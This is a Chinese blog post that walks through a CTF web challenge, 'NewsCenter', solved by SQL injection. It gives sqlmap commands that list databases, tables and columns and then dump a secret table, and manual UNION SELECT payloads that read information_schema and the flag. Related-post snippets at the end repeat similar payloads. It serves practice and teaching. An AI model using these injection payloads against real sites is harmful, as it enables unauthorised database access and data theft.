去除cnewscenter弹窗_攻防世界做题记录-NewsCenter

最新推荐文章于 2021-07-16 17:26:03 发布
最新推荐文章于 2021-07-16 17:26:03 发布
阅读量3.5k 收藏
点赞数
文章标签: 去除cnewscenter弹窗
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36293680/article/details/113711113
版权

NewsCenter

进入界面

是一个明显的SQL注入题目

(前面的图由于先存在word再复制过来所有略微有点小糊)

f79e1b4b5b71a2328005e904083f0eb7.png

sqlmap

首先使用工具偷个懒

随意的输入一个BEACON

Burp Suite抓包

5f60c312780bc78799df4d06f6962424.png

存为TXT文件(我这里存为 NEWSCENTER.txt )

放入sqlmap目录

打开大杀器-sqlmap

查找数据库

sqlmap>python sqlmap.py -r NEWSCENTER.txt –dbs

c0294773572442dbd61d09dca2ccf9fd.png

d9ce73c8c12283ab969db2d28666ec15.png

查找表

python sqlmap.py -r NEWSCENTER.txt --tables -D news

8de30fcc826db4533aff5d19289cf627.png

4944001f143bc80e5959c4eeb5ee8566.png

查找列名

python sqlmap.py -r NEWSCENTER.txt --column -D news -T secret_table

61121018e2a5a7f81362a560d4a2523a.png

c476d2ad437248d93b85395c106bf250.png

看到了希望,读取它就🆗啦

python sqlmap.py -r NEWSCENTER.txt --dump -D news -T secret_table -C fl4g

cdd4b1e846cacab2dcdd203221144d7f.png

ab43087a3d7883d5c880ac4fa7276e45.png

纯手工

来一个基本的 'union select 1,2,3 #

提示就来了

a3fe59062b4e4c4e61ad73a3d650e2ad.png

'and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS #

8b72459e98763d670c937461daf00c37.png

'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='news'#

ffc38bd90b09275d458f096b271c2b6a.png

'and 0 union select 1,column_name,data_type from information_schema.columns where table_name='secret_table'#

b44a96d9c2dc004f38249e1f39f1d4d7.png

'and 0 union select 1,2,fl4g from secret_table #

bf86ddbd1aae23c521713aaa7efd37b4.png

个人对sql注入的语句还不够熟悉

手动注入的时候还是得开卷

下次整理一份sql注入语句

具体使用在资料中有网上找到的常用sql语句

资料

蓄锐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
去除cnewscenter弹窗_攻防世界 web进阶区 NewsCenter
weixin_39874379的博客
12-22 9231
攻防世界 web进阶区 NewsCenter解题首先我们打开网页,发现题目中只有一个搜索框,然后通过查看源代码等方式都无法获得任何有用的信息。所以题目肯定是从这个搜索框入手的,那么就首先抓包试试。抓到这样一些数据,但是经过尝试也没有什么办法获取信息,只发现了搜索使用的是post请求。最后想到了一般这样的搜索框可能会存在sql注入,所以及逆行尝试。但是由于手注的技术实在是太差了,就先用sqlmap来...
弹窗dnews_center.exe如何彻底删除
热门推荐
qq_41592706的博客
07-30 2万+
最近任务栏老是莫名其妙的弹出来个提醒,关掉后没过多久又出现。 今天专门花时间研究一下这个到底是什么 现象是这样的: 点开之后是一个广告界面,很花哨很性感!上班被同事看到很不好,于是我有了关掉它的想法。。 当你关掉后浏览器后,没过多久或者重启电脑后还可以见到他。 为了搞清楚这个是什么东西,我们把鼠标放到这个美女脸上,显示是dnews_center.exe;顿时晓得了这个是隐藏起来的进程; 好吧,美女虽好但是他是个广告而已,每天打开电脑就会出现,那么我们今天就和他拜拜。 1.右键任务栏空白处,
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
电脑右下角自动弹出窗口(弹窗)
enthan809882的博客
02-19 4436
场景 电脑右下角自动弹出窗口,有时是游戏,有时是广告。 每次都手动点关闭特别麻烦,有的弹窗甚至没法点关闭。 基本是中病毒了。 解决方案 任务管理器查看有没有异常的进程。发现有个叫cnewscenter.exe的程序没见过,关闭这个进程看弹窗关闭吗? 果然关闭了,所以确定就是这个进程。 这就ok了吗? 没有这么简单的,因为肯定有程序启动启动这个程序。果然不久又弹出这个窗口了。 在任务管理器里面,右键属性,查看路径是 D:\Program Files\DTLSoft\DriveTheLife\DTLPlugs\
电脑cnewscenter_newsCenter.html
weixin_35282085的博客
01-14 835
{$web_name}.realCont .content .leftNav.fixed{ left: 3%;} {include file="header.html"}当前位置:-首页 -{$cur_root_catname} - {$cur_catname}新闻中心NEWS{foreach from=$nav item=list name=foo}{$list.catname}{/for...
PyPI 官网下载 | newscenter-2.0.4.tar.gz
01-14
《PyPI官网下载 | newscenter-2.0.4.tar.gz——深入了解Python库的发布与使用》 在Python的世界里,PyPI(Python Package Index)是最重要的资源库,它为全球的开发者提供了一个集中地,可以发布、分享并下载Python...
newscenter_app
02-20
新闻中心单击以获取实时版本背景和概述新闻中心现场直播了当今主流媒体如何报道当前的主题。 一次查看CNN,Fox News,NBC,NYTimes和Huffington Post主页上的精选文章。 这个使用React构建的应用程序充当前端,并与...
Python库 | newscenter-1.6.3.tar.gz
05-19
资源分类:Python库 所属语言:Python 资源全名:newscenter-1.6.3.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | newscenter-2.0.23.tar.gz
04-12
资源分类:Python库 所属语言:Python 资源全名:newscenter-2.0.23.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
tsys _rss程序
10-31
sRssHead=sRssHead&"<docs>NewsCenter</docs>"&sCrLf sRssHead=sRssHead&"<generator>RssGenerator</generator><items>"&sCrLf ``` 这里需要注意的是,`sCrLf=chr(13)&chr(10)`用于定义回车换行符,确保XML格式正确...
删除驱动人生后台服务的方法
08-20
卸载驱动人生后,本地服务里会残留驱动人生的后台服务无法删除,占用系统资源。并且启动项软件无法查出这种后台服务。
雷神笔记本关闭跳出垃圾游戏广告
weixin_44217936的博客
07-16 1455
当跳出垃圾广告的时候,不要急着将他关掉,在任务管理器进程当中找到他,名字为cnewscenter.exe,并定位所在文件夹的位置,再打开服务,找到了LThunderobotSvc,就是雷神驱动管理的服务。右键停止服务。然后在雷神驱动文件夹里找到uninstall卸载。就不会有弹窗广告了。 ...
如何确定windows弹出的广告窗口是哪个程序导致并找出来
qq_34412985的博客
05-25 9885
之前装电脑用的驱动人生,卸载驱动人生后,居然留下了usb宝盒这个程序,里面包括cnewscenter这个广告软件。 每次电脑开机后,就会弹出一个广告窗口,之前没理它,今天实在忍不了了,然后在下方的任务栏图标上点击右键看到了这个广告窗口的执行程序是cnewscenter.exe,然后用everything搜了下这个程序在哪儿,后来发现在C:\Program Files (x86)\DTLSoft此目录中,网上随便搜下原来是驱动人生留下的孽障。 ...
雷神笔记本关闭广告
MoL的博客
09-01 1804
都怪我自己没钱,2019年以6000大洋入手雷神 Air系列。后来老给我弹广告。上网查了好久,发现别人弹广告都是因为安装了搜狗输入法、flash等垃圾软件。我自己电脑并没有装这些(我电脑东西还是蛮多的,比如matlab pycharm ps anaconda maya motionbuilder…500G的D盘愣是让我装满了,但几乎很少装垃圾软件,装软件时都很谨慎,连我的电脑桌面都是一个图标没有,任务栏也是隐藏,导致大多数人借我电脑都是骂我,哈哈哈) 言归正传。 我是怎么发现它的呢? 右击任务栏,选择任务栏
如何清理驱动人生的新闻弹窗
KingJulien2的博客
10-16 7241
前言:驱动人生的弹窗太***了,我搜了好久才找到解决的方法,但是治标不治本,就算删了驱动人生弹新闻的newscenter的文件夹,只要Andrea RT Filters Service启动了,它就又回来了 操作步骤(截图是win7) 1、打开计算机的“管理”,可以在桌面计算机的图标,或者开始菜单那里右键打开 2、在“服务和应用程序”-“服务”中找到 Andrea RT Filters Service,右键,停止 3、删除驱动人生那个破新闻弹窗的文件夹,路径:C:\Program Fil.
攻防世界(高手进阶区)——NewsCenter
知足且坚定,温柔且上进
02-11 2140
御剑扫一下,发现有robots.txt与config.php,不过是个空白页面;放弃。 用burpsuite抓包,: 尝试xff,无果,直接sql注入,利用sqlmap. 将Request中的Raw内容拷贝到一个txt文档,用sqlmap爆。(注意将文档拷贝到sqlmap文件所在位置) sqlmap.py -r flag.txt --dbs 发现两个包,分别尝试,只有news有: sqlm...
攻防世界NewsCenter思路
yangker12148的博客
05-28 7006
打开环境后发现是这样一个页面 考虑到xss或者sql注入,尝试了alert无果,便试试sql注入,随便输入aaa后使用burp抓包 将这些保存在1.txt里,用sqlmap抓包,命令:sqlmap.py -r 1.txt --dbs 这里看到一个news,在继续,命令:sqlmap.py -r 1.txt -D news --dump 最后就得到flag啦!!! ...
攻防世界 - NewsCenter - WriteUp
哒君的博客
06-08 1万+
NewsCenter 这一题考察的是 SQL 注入 首先用 ' and 0 union select 1,2,3 # 来初步判断该sql查询返回三列数据 然后用 ' and 0 union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.COLUMNS # 得到表名,很明显我们需要得到 secret_table 表中的内容 再用 ...
攻防世界-NewsCenter详解
Mr_helloword的博客
08-11 5370
NewsCenter 进入后我们发现有一个搜索框进行新闻搜索我们尝试有无sql注入 我们输入1’ and 1=1 #判断有无sql注入发现有 查看列数1’ order by 3 # 联合查询 1’ union select 1,2,3 # 查表: 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() # 查字段: 1’ union
攻防世界 newscenter
最新发布
09-08
攻防世界NewsCenter是一个基于React构建的前端应用程序,它提供了实时版本的背景和概述,展示了当前主流媒体如何报道当下的主题。你可以通过查看CNN、Fox News、NBC、NYTimes和Huffington Post主页上的精选文章来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值